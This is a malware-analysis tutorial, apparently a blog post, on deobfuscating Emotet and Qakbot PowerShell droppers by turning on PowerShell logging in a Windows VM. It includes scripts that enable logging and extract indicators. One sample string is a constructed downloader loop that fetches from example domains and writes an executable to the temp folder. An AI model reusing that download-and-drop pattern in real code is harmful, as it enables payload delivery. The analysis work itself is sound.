Deobfuscate PowerShell using PowerShell Logging


We will use the inbuilt PowerShell logging of a Windows 10 VM to deobfuscate the PowerShell code used to deliver Emotet and Qakbot. Malware mostly uses PowerShell to download a payload from its command-and-control (CC) server and execute it.

Why do we need to do this?

  • Easy technique to deobfuscate PowerShell without using any external tool
  • Extract the CC from the PowerShell

Sample

Enable PowerShell Logging

A Windows 10 VM doesn’t require any software update to support enhanced PowerShell logging. If you still want to configure a Windows 7 VM, check the FireEye article Greater Visibility Through PowerShell Logging.

1. Open the Local Group Policy Editor and navigate to
Computer Configuration -> Administrative Templates -> Windows Components -> Windows PowerShell

Initial PowerShell Logging Setting

2. Enable the three options shown below. Enter * in Module Names for Module Logging.
PowerShell Group Policy Setting

Tip: Enter gpedit.msc in Run to open the Local Group Policy Editor, and eventvwr.msc for Event Viewer.
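The same settings can be applied without clicking through gpedit.msc. The following is an added example (not from the original post): it writes the policy registry values that the three Group Policy settings in the Windows PowerShell folder write themselves (my reading of the screenshot is that they are Turn on Module Logging, Turn on PowerShell Script Block Logging and Turn on PowerShell Transcription). The transcript folder C:\PSTranscripts is an assumption. Run it from an elevated PowerShell in the analysis VM only.

```powershell
# Added example, not from the original post: enable the three PowerShell logging
# policies through their registry equivalents. Run elevated, in the analysis VM.
$base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# 1. Module Logging for every module ('*' in Module Names, as in the post)
New-Item -Path "$base\ModuleLogging"             -Force | Out-Null
New-Item -Path "$base\ModuleLogging\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path "$base\ModuleLogging"             -Name EnableModuleLogging -Value 1   -Type DWord
Set-ItemProperty -Path "$base\ModuleLogging\ModuleNames" -Name '*'                 -Value '*' -Type String

# 2. Script Block Logging: records the decoded, deobfuscated script text (event 4104)
New-Item -Path "$base\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "$base\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord

# 3. Transcription: a text record of every session, written to OutputDirectory
#    (C:\PSTranscripts is an assumed path; choose your own)
New-Item -Path "$base\Transcription" -Force | Out-Null
Set-ItemProperty -Path "$base\Transcription" -Name EnableTranscripting    -Value 1 -Type DWord
Set-ItemProperty -Path "$base\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
Set-ItemProperty -Path "$base\Transcription" -Name OutputDirectory -Value 'C:\PSTranscripts' -Type String

# Show what was written so it can be compared with the gpedit.msc view
Get-ChildItem -Path $base -Recurse | Get-ItemProperty
```

New PowerShell processes started after this pick up the policy immediately; a host that is already running keeps its previous settings until it is restarted.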

Steps

  1. Open Event Viewer and navigate to Windows Logs -> Applications and Services Logs -> Windows PowerShell, right-click and clear the existing log.
  2. Execute the malware and wait for some time, 30-60 seconds.
  3. Open Process Hacker and check that the PowerShell process has terminated.
  4. Open Event Viewer, navigate to the Windows PowerShell log and check the entries; you will see some deobfuscated PowerShell.
  5. Analyze the PowerShell, if needed, to extract the CC info.
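Reading the entries in Event Viewer works for one sample, but the script blocks can also be pulled out with PowerShell itself. The post reads the classic Windows PowerShell log, where Module Logging records pipeline execution details; Script Block Logging additionally writes the full decoded script text as event 4104 to the Microsoft-Windows-PowerShell/Operational log, and that is what the following collects. This is an added example, not code from the original post: it gathers every 4104 event since a start time, joins the parts of long scripts that Windows splits across several events, and writes each block to a file for review. The output folder C:\Analysis\ScriptBlocks and the 10-minute window are assumptions.

```powershell
# Added example, not from the original post: after the sample has run (steps 2-3),
# collect the script blocks PowerShell logged, stitch multi-part blocks back
# together and write each to a file for review. $OutDir and the 10-minute window
# are assumptions; adjust them for your VM.
param(
    [string]   $OutDir = 'C:\Analysis\ScriptBlocks',
    [datetime] $Since  = (Get-Date).AddMinutes(-10)
)

New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

# Script Block Logging writes event 4104 to Microsoft-Windows-PowerShell/Operational.
$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-PowerShell/Operational'
    Id        = 4104
    StartTime = $Since
} -ErrorAction SilentlyContinue

# 4104 properties: [0] MessageNumber, [1] MessageTotal, [2] ScriptBlockText,
# [3] ScriptBlockId, [4] Path. A long script is split over several events that
# share one ScriptBlockId and must be joined in MessageNumber order.
$blocks = $events | ForEach-Object {
    [pscustomobject]@{
        Time   = $_.TimeCreated
        Number = [int]$_.Properties[0].Value
        Total  = [int]$_.Properties[1].Value
        Text   = [string]$_.Properties[2].Value
        Id     = [string]$_.Properties[3].Value
        Path   = [string]$_.Properties[4].Value
    }
} | Group-Object Id | ForEach-Object {
    $parts = @($_.Group | Sort-Object Number)
    [pscustomobject]@{
        Id    = $_.Name
        Time  = $parts[0].Time
        Path  = $parts[0].Path
        Parts = $parts.Count
        Total = $parts[0].Total
        Text  = -join ($parts | ForEach-Object Text)
    }
} | Sort-Object Time

foreach ($b in $blocks) {
    # A block whose parts do not all appear in the log is truncated; flag it.
    $complete = ($b.Parts -eq $b.Total)
    $origin   = if ($b.Path) { $b.Path } else { '<command line / no file>' }
    $file     = Join-Path $OutDir ('{0:yyyyMMdd_HHmmss}_{1}.ps1.txt' -f $b.Time, $b.Id)
    Set-Content -Path $file -Value $b.Text -Encoding UTF8
    '{0}  {1}  parts={2}/{3}  complete={4}  origin={5}' -f $b.Time, $b.Id, $b.Parts, $b.Total, $complete, $origin
}
```

Each stage of a multi-stage loader appears as its own block, so the files come out in execution order: the original obfuscated command first, then whatever it decoded and invoked. A block without a Path was passed on the command line or to Invoke-Expression rather than loaded from a .ps1 file, which is the usual case for a downloader launched from a document macro.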

Example of Emotet & Qakbot

Qakbot
  1. The .hta file contains obfuscated VBScript code.
    Initial obfuscated .hta file, which contains the VBScript
  2. Deobfuscate the VBScript by replacing the junk characters ]+($)#!%/=[?-_&*<> with an empty string; you can then see the obfuscated PowerShell.
    Initial obfuscated PowerShell
  3. But we don’t need to do the step above: we can just run the .hta file and see the much clearer PowerShell code shown below.
    Qakbot PowerShell deobfuscation: the 2nd-level deobfuscated code is much better, as you can see the CC
  4. Extract the CC by executing the PowerShell code below.
    Qakbot CC: execute the PowerShell code to extract the CC
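The post extracts the CC by executing the string-building part of the deobfuscated code. An alternative that does not run any of the sample's code is to parse the logged script block text for indicators. The following is an added example, not from the original post: it pulls URLs, hosts and drop-file paths out of a script block with regular expressions. The input text is a constructed stand-in for a downloader using reserved example domains; in practice pass the ScriptBlockText of a logged 4104 event (or the file saved in the previous step).

```powershell
# Added example, not from the original post: extract network indicators from a
# deobfuscated script block without executing it. Pass the logged script text as
# -ScriptText; with no argument a constructed sample (example domains) is used.
param([string]$ScriptText)

if (-not $ScriptText) {
    # Constructed stand-in for a deobfuscated downloader: a '@'-separated URL list
    # and a download loop, as in the Qakbot stage shown above. Not real malware.
    $ScriptText = @'
$u = 'http://a.example.com/wp-content/x1/@https://b.example.net/img/x2/@http://c.example.org/cgi/x3/'.Split('@')
foreach ($x in $u) { try { (New-Object Net.WebClient).DownloadFile($x, "$env:TEMP\123.exe"); break } catch {} }
'@
}

# 1. URLs: stop at whitespace, quotes and the separators these lists are split on
$urls = [regex]::Matches($ScriptText, 'https?://[^\s''"@,;)]+') | ForEach-Object Value

# 2. Distinct hosts, for blocklists and log searches
$hosts = $urls | ForEach-Object { ([uri]$_).Host } | Sort-Object -Unique

# 3. Files written under the common user-writable environment paths
$drops = [regex]::Matches($ScriptText, '\$env:(TEMP|APPDATA|PUBLIC)\\[\w.-]+') | ForEach-Object Value

[pscustomobject]@{
    UrlCount = @($urls).Count
    Urls     = $urls
    Hosts    = $hosts
    Drops    = $drops
}
```

With the constructed sample this yields three URLs, the hosts a.example.com, b.example.net and c.example.org, and the drop path $env:TEMP\123.exe. If a sample builds its URLs from concatenated fragments, the regex will not see them in the first block; the later block that the loader actually invokes, logged as its own 4104 event, carries the assembled strings.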
Emotet
Obfuscated Emotet PowerShell cmd: contains the PowerShell command extracted from the Emotet doc
Emotet PowerShell, 1st entry

Emotet deobfuscated PowerShell: check the highlighted deobfuscated code

Thanks for reading. Feel free to connect with me on LinkedIn for any suggestions or comments.

For more updates and exclusive content, subscribe to our newsletter. Happy Reversing! 😊
